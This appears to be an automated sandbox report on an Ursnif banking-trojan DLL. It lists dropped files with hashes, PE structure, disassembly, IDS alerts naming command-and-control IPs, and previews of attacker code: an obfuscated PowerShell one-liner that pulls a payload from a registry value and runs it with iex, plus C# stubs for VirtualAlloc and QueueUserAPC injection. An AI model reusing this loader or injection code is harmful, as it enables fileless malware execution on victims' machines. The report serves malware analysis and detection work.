                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                  File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48a, 9 symbols
                                  Category:dropped
                                  Size (bytes):1328
                                  Entropy (8bit):3.9937375893458604
                                  Encrypted:false
                                  SSDEEP:24:Hne9E2+fz4fDfHJhKdNWI+ycuZhNGakSOPNnq9qd:Zz4L3Kd41ulGa3Sq9K
                                  MD5:1CB0708B686A80571C1D6F35AFB4B5EF
                                  SHA1:89B85C23378EC5776703163F5DDE76E0FF0F546A
                                  SHA-256:4BB51F2D6D21CF00382055EE5B08C44141CEF95B3FBEFAFFDA6482AFAEB35EBA
                                  SHA-512:1CDE546BEDBE488883A36428A0F488A1D3B84D0F2F5F46797C9ECA68047B0ED251F2CF5274A45ACBD7FB8B2C2DA0D17512C7FFFC8DE33E72C64A58366D806660
                                  Malicious:false
                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                  File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48a, 9 symbols
                                  Category:dropped
                                  Size (bytes):1328
                                  Entropy (8bit):3.9848344940495912
                                  Encrypted:false
                                  SSDEEP:24:Hre9E2+f5EVDfHeFhKdNWI+ycuZhNRakSvPNnq9qd:t5+SKd41ulRa3tq9K
                                  MD5:1BE7AE55CFD56E91642C7E8AF87D7C49
                                  SHA1:84336142BA5B6836C367B2E4D4601A6DEFD28B1F
                                  SHA-256:2514F3E3AED73A9CF0ACBA0E2E3D8366C8E0B480602AFD96D1013189C110FE10
                                  SHA-512:5C950D3A5672B611C6C02173898C6EB99B377CBA8FA3BEC979B4DDB39DBF8C203E20EAC885BDE131F1AA53FB7F9317198B4B4F549A7F67AB1351BA2DBEF99D4F
                                  Malicious:false
                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:very short file (no magic)
                                  Category:dropped
                                  Size (bytes):1
                                  Entropy (8bit):0.0
                                  Encrypted:false
                                  SSDEEP:3:U:U
                                  MD5:C4CA4238A0B923820DCC509A6F75849B
                                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                  Malicious:false
                                  Preview:1
                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:very short file (no magic)
                                  Category:dropped
                                  Size (bytes):1
                                  Entropy (8bit):0.0
                                  Encrypted:false
                                  SSDEEP:3:U:U
                                  MD5:C4CA4238A0B923820DCC509A6F75849B
                                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                  Malicious:false
                                  Preview:1
                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                  File Type:MSVC .res
                                  Category:dropped
                                  Size (bytes):652
                                  Entropy (8bit):3.1071600486844355
                                  Encrypted:false
                                  SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryTak7YnqqvPN5Dlq5J:+RI+ycuZhNRakSvPNnqX
                                  MD5:C55A91426D4E9E4776465B3C65B422A9
                                  SHA1:0C66B98DCB5B67DA8AC6169D52D7A6DC62B31A60
                                  SHA-256:00CFA6111123329C9E7723ACB0AA9AB035FA19543A912AEC84001847C14B643C
                                  SHA-512:37FC760C898CC3991D187283F7619556B10C1027437B12EEFCD731E7010CEE5DF205CAA5A14473D3F4D4DD7E67EB9C07DB9B8E65973A3F08DD41193ED4F4AD82
                                  Malicious:false
                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:UTF-8 Unicode (with BOM) text
                                  Category:dropped
                                  Size (bytes):392
                                  Entropy (8bit):4.988829579018284
                                  Encrypted:false
                                  SSDEEP:6:V/DsYLDS81zuJ6VMRSRa+eNMjSSRr92B7SSRNAtwy:V/DTLDfuk9eg5r9yeqy
                                  MD5:80545CB568082AB66554E902D9291782
                                  SHA1:D013E59DC494D017F0E790D63CEB397583DCB36B
                                  SHA-256:E15CA20CFE5DE71D6F625F76D311E84240665DD77175203A6E2D180B43926E6C
                                  SHA-512:C5713126B0CB060EDF4501FE37A876DAFEDF064D9A9DCCD0BD435143DAB7D209EFBC112444334627FF5706386FB2149055030FCA01BA9785C33AC68E268B918D
                                  Malicious:false
                                  Preview:.using System;.using System.Runtime.InteropServices;..namespace W32.{. public class buvbcy. {. [DllImport("kernel32")].public static extern IntPtr GetCurrentProcess();.[DllImport("kernel32")].public static extern void SleepEx(uint jujqjjcr,uint fvu);.[DllImport("kernel32")].public static extern IntPtr VirtualAlloc(IntPtr fnpqam,uint ecktq,uint arixnpjcmw,uint mbhifa);.. }..}.
                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators
                                  Category:dropped
                                  Size (bytes):369
                                  Entropy (8bit):5.270459273247466
                                  Encrypted:false
                                  SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2wkn23fB0zxs7+AEszIwkn23fb:p37Lvkmb6KRfeWZEifT
                                  MD5:4BA7EB41009075E749F0B76FF8E627C7
                                  SHA1:55D0D959642BA2615C822DF87CE34BED865D0E48
                                  SHA-256:C36F10AB5BB15873A62D1C3CB86E83586AE1AB6B4EF500CE0CD1230FD08469C9
                                  SHA-512:ACF474A20AB6D721CDBA5C2F6946ED844BCB29B0F00FAFB623764A150D3D698BEF999D7722B3CDACCDF769ACFE8E5D743CF55C3007288D4C8942980B1938564C
                                  Malicious:false
                                  Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\hpvnexdj\hpvnexdj.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\hpvnexdj\hpvnexdj.0.cs"
                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                  Category:dropped
                                  Size (bytes):3584
                                  Entropy (8bit):2.5953713703523387
                                  Encrypted:false
                                  SSDEEP:24:etGSk/u2Bg85z7xlfwZD6TgdWqtkZfhKwWI+ycuZhNRakSvPNnq:6NYb5hFCD6GWdJhKr1ulRa3tq
                                  MD5:4DBC5D2FD85CD8734346AB2635CD4690
                                  SHA1:C59399E402B02C71C8E6A63335C3602A830A34AA
                                  SHA-256:3532D05C2301FDE15F9B397F06B0B7F9EEBB42223AA05118F112D636B7FB01DF
                                  SHA-512:F9E77C80C3CC668C30AFB22187BDE3254D7D84CD6E2D4107B5C6ECCD968AB8B7833A585A5E518896017B16FBA8D818C2F5A55C19C2013CA0D682778626CE3820
                                  Malicious:false
                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:UTF-8 Unicode (with BOM) text, with very long lines, with CRLF, CR line terminators
                                  Category:modified
                                  Size (bytes):866
                                  Entropy (8bit):5.334990107523655
                                  Encrypted:false
                                  SSDEEP:24:AId3ka6KRffEifyKaM5DqBVKVrdFAMBJTH:Akka6CfEuyKxDcVKdBJj
                                  MD5:10C4DEFFF345129A9A7EF066852B06B8
                                  SHA1:BAAD4E83D4E4E039D5CF18084AC88CFA6CDD9EEE
                                  SHA-256:7FD52C3C29CAA24D170C4A78D81AFF855035A7AD622344F50794BC945DC3C088
                                  SHA-512:A9D2042FD2AA7E2AB73604325FA7DB412EAA79C597605381544759794DB3454133D0D02BCDF52079A476B82A2F88FAC5140D4BEADD75E591EB20E67A42206E96
                                  Malicious:false
                                  Preview:.C:\Windows\system32> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\hpvnexdj\hpvnexdj.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\hpvnexdj\hpvnexdj.0.cs"......Microsoft (R) Visual C# Compiler version 4.7.3056.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                  File Type:MSVC .res
                                  Category:dropped
                                  Size (bytes):652
                                  Entropy (8bit):3.1104316968772165
                                  Encrypted:false
                                  SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gry4ak7YnqqOPN5Dlq5J:+RI+ycuZhNGakSOPNnqX
                                  MD5:979D52D8189194B5E14CB5310140FEBF
                                  SHA1:4D78D341E06D50517727664FCDCDEC627218452F
                                  SHA-256:F7CF743322A4D03E4CBCC9E7320B69DEDB181B1C6F114532EE2BB22052903C0D
                                  SHA-512:D02DCFC9C772B79015C3B346A57B6628A42C5A2BB7A864B5A3896F204ECB1AAD677EEE65C22BAC6548219D33B5CDE8E005B140D2D992D5FD675CCF58A5D4ED5C
                                  Malicious:false
                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:UTF-8 Unicode (with BOM) text
                                  Category:dropped
                                  Size (bytes):403
                                  Entropy (8bit):5.058106976759534
                                  Encrypted:false
                                  SSDEEP:6:V/DsYLDS81zuJiWmMRSR7a1nQTsyBSRa+rVSSRnA/fpM+y:V/DTLDfuQWMBDw9rV5nA/3y
                                  MD5:99BD08BC1F0AEA085539BBC7D61FA79D
                                  SHA1:F2CA39B111C367D147609FCD6C811837BE2CE9F3
                                  SHA-256:8DFF0B4F90286A240BECA27EDFC97DCB785B73B8762D3EAE7C540838BC23A3E9
                                  SHA-512:E27A0BF1E73207800F410BA9399F1807FBA940F82260831E43C8F0A8B8BFA668616D63B53755526236433396AF4EF21E1EB0DFA9E92A0F34DB8A14C292660396
                                  Malicious:false
                                  Preview:.using System;.using System.Runtime.InteropServices;..namespace W32.{. public class bju. {. [DllImport("kernel32")].public static extern uint QueueUserAPC(IntPtr wqyemwbu,IntPtr vlbfvx,IntPtr hokikv);.[DllImport("kernel32")].public static extern IntPtr GetCurrentThreadId();.[DllImport("kernel32")].public static extern IntPtr OpenThread(uint uqvnjbf,uint pmyb,IntPtr rheqdsvorya);.. }..}.
                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators
                                  Category:dropped
                                  Size (bytes):369
                                  Entropy (8bit):5.258248605403324
                                  Encrypted:false
                                  SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2wkn23fNNn0zxs7+AEszIwkn23fN1BH:p37Lvkmb6KRfIWZEifdH
                                  MD5:E3D5180D8E1336C41051105818BE2B0E
                                  SHA1:AE3D5991EDADC6A55D9351A19253C903733F5B04
                                  SHA-256:CC21C5780B903B228B5DA454C5642EC3B5251A2D37C56B88F343C2D27C45EEF2
                                  SHA-512:E8333E056424F83F4BAF44CC097BEF12E427923DB470591F5D54B641B0560A2101FCC8FDA818441932E4F080CD5E55D49F7B4556601C05734B19B285FB002619
                                  Malicious:false
                                  Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\vebwfha3\vebwfha3.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\vebwfha3\vebwfha3.0.cs"
                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                  Category:dropped
                                  Size (bytes):3584
                                  Entropy (8bit):2.6180342948259594
                                  Encrypted:false
                                  SSDEEP:24:etGSw8OmU0t3lm85xWAseO4zFQ64pfUPtkZf63ZVUWI+ycuZhNGakSOPNnq:6KXQ3r5xNO6QfUuJ6H31ulGa3Sq
                                  MD5:150B9753F8C36647FE4D37F3A8DD0546
                                  SHA1:B4E0D8D0142F6E9541DA2DE48EC1AF9F4E1700B6
                                  SHA-256:D850AEE38DE73F32A5AC8D038A8DFF069466260B2335820C578871B7850354BA
                                  SHA-512:6B21F053D792C6383E6237C31B9CB4E37831393773B84560BB7ED271E7BD76B8CC343459D175CAAB474512B782CD27143C191DAB868A9361AACB9F68A832D95C
                                  Malicious:false
                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:UTF-8 Unicode (with BOM) text, with very long lines, with CRLF, CR line terminators
                                  Category:modified
                                  Size (bytes):866
                                  Entropy (8bit):5.3253388748674
                                  Encrypted:false
                                  SSDEEP:24:AId3ka6KRfZEifdOKaM5DqBVKVrdFAMBJTH:Akka6CZEugKxDcVKdBJj
                                  MD5:EF7C9839A3464CD4591B470A7606772D
                                  SHA1:A0BDFFD77A23860C0CECA610EC39EF0D18791D63
                                  SHA-256:E4225D396AC2BCA46D2270CBB2A3B24219CFA1C80E7B7CE72F8CB615774558F7
                                  SHA-512:35F9BFBB7932DF4BC88D0D0EBFD56AB139B2E858C27D770AC1C97E016C00622D4FBBECB98FA43945A231B46F4847717BC28642E5DAA2272B394A3B6E078B9F68
                                  Malicious:false
                                  Preview:.C:\Windows\system32> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\vebwfha3\vebwfha3.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\vebwfha3\vebwfha3.0.cs"......Microsoft (R) Visual C# Compiler version 4.7.3056.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminators
                                  Category:dropped
                                  Size (bytes):1367
                                  Entropy (8bit):5.376095725121092
                                  Encrypted:false
                                  SSDEEP:24:BxSA/vm7vBZjx2DOXUW7IJ03LCH64qWkHjeTKKjX4CIym1ZJXHv8IJ03LCH64Dtn:BZ3MvjjoOb+0E64tkqDYB1Zd8+0E64Jn
                                  MD5:0C043058311733BC5A8B342A73C90ABE
                                  SHA1:7B36C2A1E710510276E623A6B0E93548B4091398
                                  SHA-256:BA065A6FDBBD542CA9DCAC0F5A58F8B8FE77995F9EEBB8ABB74E6DCDB520EFB9
                                  SHA-512:49607A25228CF28C2DFEEC6A86E6E03DD372781FF1B7CD60BEB71B20F5DBF5B5FC7E0482022CD8CEBA7ED3F16A9130A5BAAA20BDFEAFBE2D80F6F0CD0E428D22
                                  Malicious:false
                                  Preview:.**********************..Windows PowerShell transcript start..Start time: 20220525111812..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 414408 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe new-alias -name sdiwcaphnc -value gp; new-alias -name ixgamvji -value iex; ixgamvji ([System.Text.Encoding]::ASCII.GetString((sdiwcaphnc HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E).UrlsReturn))..Process ID: 7056..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20220525111812..**********************..PS>new-alias -name sdiwcaphnc -value gp; new-alias -name ixgamvji -value iex; ixga
                                  Process:C:\Windows\explorer.exe
                                  File Type:ASCII text, with no line terminators
                                  Category:dropped
                                  Size (bytes):222
                                  Entropy (8bit):5.433287616586257
                                  Encrypted:false
                                  SSDEEP:6:QHYK1sVCVgKnsQ+LgyKBM34H6183F1tu4r9iyeqmM:Qbs8VNsRLgyaI4HnA4cyeHM
                                  MD5:3D92E8BE9593C089C68955E7ADB79EFB
                                  SHA1:97DB408F393D70CA130C8C854CEB135AACCAEA68
                                  SHA-256:149D79E478EAAE27BC4FF92F7EC1D30BEFDE07F61AFEECEA47033AD0A53065D4
                                  SHA-512:7B0A58A56CA83573CDEDB3DAA46AAEB8DCB7C7819971F6BFB0338F71D76CFE0ED91CED5A428EE41E77D8482326EC6C9DEFC9A876238C523C6AE92CA79D8D8D0F
                                  Malicious:false
                                  Preview:new-alias -name dvjacws -value gp;new-alias -name nvbirk -value iex;nvbirk ([System.Text.Encoding]::ASCII.GetString((dvjacws "HKCU:\Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn))
                                  Process:C:\Windows\explorer.exe
                                  File Type:MS Windows shortcut, Item id list present, Has Relative path, ctime=Sun Dec 31 23:06:32 1600, mtime=Sun Dec 31 23:06:32 1600, atime=Sun Dec 31 23:06:32 1600, length=0, window=hidenormalshowminimized
                                  Category:dropped
                                  Size (bytes):838
                                  Entropy (8bit):3.073236880282747
                                  Encrypted:false
                                  SSDEEP:12:8glVm/3BVSXvk44X3ojsqzKtnWNaVgiNL4t2Y+xIBjK:8p/BHYVKVWiV57aB
                                  MD5:CA1C201059C5BFD5900F5EB2466883CC
                                  SHA1:BF3670A8C06A4FABC5C410F368E178B353F9166C
                                  SHA-256:E5717E89B0D46C5E89F39410FA7A9DE94AA6A3301F8AC920F84F1A7179554085
                                  SHA-512:2273AF46D41B9698B23AEADD8EFBEF80017CFD465B4347CFB99C2FEAE371F39A511288AA64AAFA2E35DD2AD883D8E43D70A65E62C18977C6C6D85E3153041D4C
                                  Malicious:false
                                  File type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                  Entropy (8bit):7.281239366352352
                                  TrID:
                                  • Win32 Dynamic Link Library (generic) (1002004/3) 99.60%
                                  • Generic Win/DOS Executable (2004/3) 0.20%
                                  • DOS Executable Generic (2002/1) 0.20%
                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                  File name:628df1368bdb5.dll
                                  File size:438272
                                  MD5:2ced3a825a7b8d9ad0153b2f8566b357
                                  SHA1:4b6484602c29c298b5270f2c95e9aeeabb162737
                                  SHA256:f760495de9b1a0a152075541f40014ceb46925213da7e2c542bc6e606bea46fc
                                  SHA512:6e6d99f59cfa0f2f89f172e349a6fc3fc93482e5de1783ebe38bddac4338b7fe4139b82361caa9c0ed19613cce94b45f4768567a9b1b69faddd9055ed78b9730
                                  SSDEEP:6144:S0mLsr+3OV4DS3D7qBWLARf3RBsFuIiUkok9dHGYgkKeOSnKM66C+m6iMabuFGGK:wsBUSzjLIRBMkf9dHLpKepKr6CvXG
                                  TLSH:EC94F14857685D66D84647370CE1971EFCE7FE2EE63B7ABE20642C8FF95B0104912B0A
                                  Icon Hash:9068eccc64f6e2ad
                                  Entrypoint:0x401520
                                  Entrypoint Section:.text
                                  Digitally signed:false
                                  Imagebase:0x400000
                                  Subsystem:windows gui
                                  Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
                                  DLL Characteristics:TERMINAL_SERVER_AWARE
                                  Time Stamp:0x3EC34607 [Thu May 15 07:47:19 2003 UTC]
                                  TLS Callbacks:
                                  CLR (.Net) Version:
                                  OS Version Major:5
                                  OS Version Minor:0
                                  File Version Major:5
                                  File Version Minor:0
                                  Subsystem Version Major:5
                                  Subsystem Version Minor:0
                                  Import Hash:8000dfa78ad003480e4532227762516a
                                  Instruction
                                  push ebp
                                  mov ebp, esp
                                  inc edx
                                  add ecx, FFFFFFFFh
                                  call 00007FF33112452Ah
                                  pop eax
                                  pop eax
                                  mov dword ptr [004136F4h], eax
                                  mov edx, dword ptr [00413810h]
                                  sub edx, 00005289h
                                  call edx
                                  mov eax, ebx
                                  mov dword ptr [004136F0h], eax
                                  mov eax, esi
                                  mov dword ptr [004136E8h], eax
                                  mov dword ptr [004136F8h], ebp
                                  mov dword ptr [004136ECh], edi
                                  add dword ptr [004136F8h], 00000004h
                                  loop 00007FF3311244D7h
                                  mov dword ptr [ebp+00h], eax
                                  nop
                                  nop
                                  xor eax, ebx
                                  xchg eax, ebp
                                  jnbe 00007FF33112453Fh
                                  xor dword ptr fs:[edi+7410DF14h], ecx
                                  in al, dx
                                  sbb ecx, dword ptr [edx-4BE066DDh]
                                  adc al, 5Ah
                                  pop ss
                                  scasd
                                  push ss
                                  mov esp, BDFBFCACh
                                  dec edi
                                  dec edi
                                  inc ebx
                                  mov dh, 69h
                                  jle 00007FF331124535h
                                  jno 00007FF331124517h
                                  or ah, bl
                                  jno 00007FF3311244D7h
                                  jmp 00007FF2DAACE122h
                                  push edx
                                  adc edi, eax
                                  adc dword ptr [edi], eax
                                  inc ecx
                                  push es
                                  loope 00007FF3311244B1h
                                  mov esi, BBE334D9h
                                  mov bh, 32h
                                  sub cl, byte ptr [edi]
                                  mov dword ptr [8C9943A9h], eax
                                  push es
                                  pop ds
                                  sal byte ptr [edi], 1
                                  jp 00007FF3311244F8h
                                  dec esi
                                  pop esi
                                  sahf
                                  add al, 75h
                                  loope 00007FF3311244CAh
                                  daa
                                  or eax, dword ptr [esi-4Ch]
                                  push cs
                                  push FEA26B46h
                                  imul edx, dword ptr [eax+66h], D5h
                                  sbb al, 4Bh
                                  adc ah, byte ptr [ebp+01h]
                                  xchg byte ptr [ecx-414D2E51h], bl
                                  aad 8Ah
                                  leave
                                  cmp al, 56h
                                  sbb bl, dh
                                  or byte ptr [ecx-71h], 0000001Fh
                                  stosd
                                   Name | Virtual Address | Virtual Size | Is in Section
                                   IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                                   IMAGE_DIRECTORY_ENTRY_IMPORT | 0xd8a0 | 0x8c | .rdata
                                   IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x61000 | 0x9f28 | .rsrc
                                   IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                                   IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                                   IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x6b000 | 0xf3c | .reloc
                                   IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                                   IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                                   IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                   IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                                   IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                                   IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                                   IMAGE_DIRECTORY_ENTRY_IAT | 0xd000 | 0x7c | .rdata
                                   IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                                   IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                                   IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                                   Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                   .text | 0x1000 | 0xb8c0 | 0xc000 | False | 0.0830078125 | data | 1.1298671209 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                   .rdata | 0xd000 | 0xbea | 0x1000 | False | 0.286376953125 | data | 4.80076279463 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                   .data | 0xe000 | 0x7b80 | 0x6000 | False | 0.380167643229 | data | 5.99893454106 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                   .crt | 0x16000 | 0x1dc01 | 0x1e000 | False | 0.988452148437 | data | 7.98104004555 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                   .erloc | 0x34000 | 0x2c91e | 0x2d000 | False | 0.988232421875 | data | 7.98142116636 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                   .rsrc | 0x61000 | 0x9f28 | 0xa000 | False | 0.602783203125 | data | 6.51666400073 | IMAGE_SCN_LNK_REMOVE, IMAGE_SCN_TYPE_NO_PAD, IMAGE_SCN_TYPE_GROUP, IMAGE_SCN_LNK_INFO, IMAGE_SCN_MEM_PROTECTED, IMAGE_SCN_TYPE_COPY, IMAGE_SCN_CNT_CODE, IMAGE_SCN_NO_DEFER_SPEC_EXC, IMAGE_SCN_MEM_READ
                                   .reloc | 0x6b000 | 0x133a | 0x2000 | False | 0.218994140625 | data | 3.75989927364 | IMAGE_SCN_TYPE_NOLOAD, IMAGE_SCN_TYPE_NO_PAD, IMAGE_SCN_MEM_FARDATA, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_LNK_OTHER, IMAGE_SCN_LNK_INFO, IMAGE_SCN_LNK_OVER, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_LNK_COMDAT, IMAGE_SCN_GPREL, IMAGE_SCN_MEM_READ
                                   Name | RVA | Size | Type | Language | Country
                                   RT_BITMAP | 0x61360 | 0x666 | data | English | United States
                                   RT_ICON | 0x619c8 | 0x485d | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | English | United States
                                   RT_ICON | 0x66228 | 0x25a8 | dBase IV DBT of `.DBF, block length 9216, next free block index 40, next free block 331218944, next used block 4106092544 | English | United States
                                   RT_ICON | 0x687d0 | 0xea8 | data | English | United States
                                   RT_ICON | 0x69678 | 0x8a8 | dBase IV DBT of @.DBF, block length 1024, next free block index 40, next free block 0, next used block 0 | English | United States
                                   RT_ICON | 0x69f20 | 0x568 | GLS_BINARY_LSB_FIRST | English | United States
                                   RT_DIALOG | 0x6a488 | 0xb4 | data | English | United States
                                   RT_DIALOG | 0x6a540 | 0x120 | data | English | United States
                                   RT_DIALOG | 0x6a660 | 0x158 | data | English | United States
                                   RT_DIALOG | 0x6a7b8 | 0x202 | data | English | United States
                                   RT_DIALOG | 0x6a9c0 | 0xf8 | data | English | United States
                                   RT_DIALOG | 0x6aab8 | 0xa0 | data | English | United States
                                   RT_DIALOG | 0x6ab58 | 0xee | data | English | United States
                                   RT_GROUP_ICON | 0x6ac48 | 0x4c | data | English | United States
                                   RT_VERSION | 0x6ac98 | 0x290 | MS Windows COFF PA-RISC object file | English | United States
                                   DLL | Import
                                   ADVAPI32.dll | EnumServicesStatusExW, RegGetValueA, GetSidSubAuthorityCount
                                   msvcrt.dll | fgetwc, strcoll
                                   USER32.dll | GetClassNameA, LockWorkStation, GetMessagePos, GetWindowWord, IsWindow, GetClientRect, GetUpdateRgn
                                   GDI32.dll | GetCharWidthFloatA, GetTextMetricsW, ExtEscape
                                   OLEAUT32.dll | LoadTypeLibEx
                                   KERNEL32.dll | GetBinaryTypeA, GetModuleFileNameA, LocalHandle, GetThreadLocale, GetFileTime, GlobalFlags, EnumResourceTypesA, GetCommState, GlobalFree
                                   Description | Data
                                   LegalCopyright | A Company. All rights reserved.
                                   InternalName |
                                   FileVersion | 1.0.0.0
                                   CompanyName | A Company
                                   ProductName |
                                   ProductVersion | 1.0.0.0
                                   FileDescription |
                                   OriginalFilename | myfile.exe
                                   Translation | 0x0409 0x04b0
                                   Language of compilation system | Country where language is spoken | Map
                                   English | United States |
                                   Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
                                   05/25/22-11:18:02.070939 | TCP | 2033204 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) | 49770 | 80 | 192.168.2.4 | 176.10.119.68
                                   05/25/22-11:17:41.032657 | TCP | 2033204 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) | 49761 | 80 | 192.168.2.4 | 13.107.43.16
                                   05/25/22-11:18:02.070939 | TCP | 2033203 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) | 49770 | 80 | 192.168.2.4 | 176.10.119.68
                                   05/25/22-11:17:41.032657 | TCP | 2033203 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) | 49761 | 80 | 192.168.2.4 | 13.107.43.16
